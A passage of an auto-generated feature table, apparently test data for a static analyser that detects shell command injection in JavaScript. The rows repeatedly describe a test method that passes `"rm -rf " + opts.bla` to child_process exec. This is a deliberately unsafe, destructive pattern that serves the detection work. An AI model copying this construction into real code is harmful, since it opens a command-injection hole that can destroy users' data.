name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | cp | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | cp | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | this | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | this | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | 'arguments' object of method start of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | 'arguments' object of method start of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | 'arguments' object of method start of class Foo | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | 'arguments' object of method start of class Foo | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | 'arguments' object of method start of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | (opts) ... T OK\\n\\t} | assignedToPropName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | (opts) ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | (opts) ... T OK\\n\\t} | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | (opts) ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | exceptional return of method start of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | exceptional return of method start of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | exceptional return of method start of class Foo | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | exceptional return of method start of class Foo | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | exceptional return of method start of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | return of method start of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | return of method start of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | return of method start of class Foo | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | return of method start of class Foo | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:282:2 | return of method start of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:8:276:11 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:4 | cp | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:4 | cp | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:4 | cp | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:9 | cp.exec | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:9 | cp.exec | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:9 | cp.exec | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | exceptional return of cp.exec ... ts.bla) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | exceptional return of cp.exec ... ts.bla) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | exceptional return of cp.exec ... ts.bla) | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | exceptional return of cp.exec ... ts.bla) | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | exceptional return of cp.exec ... ts.bla) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:6:277:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:6:277:9 | exec | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:6:277:9 | exec | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:6:277:9 | exec | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:6:277:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:19 | "rm -rf " | stringConcatenatedWith | -endpoint- opts.bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla 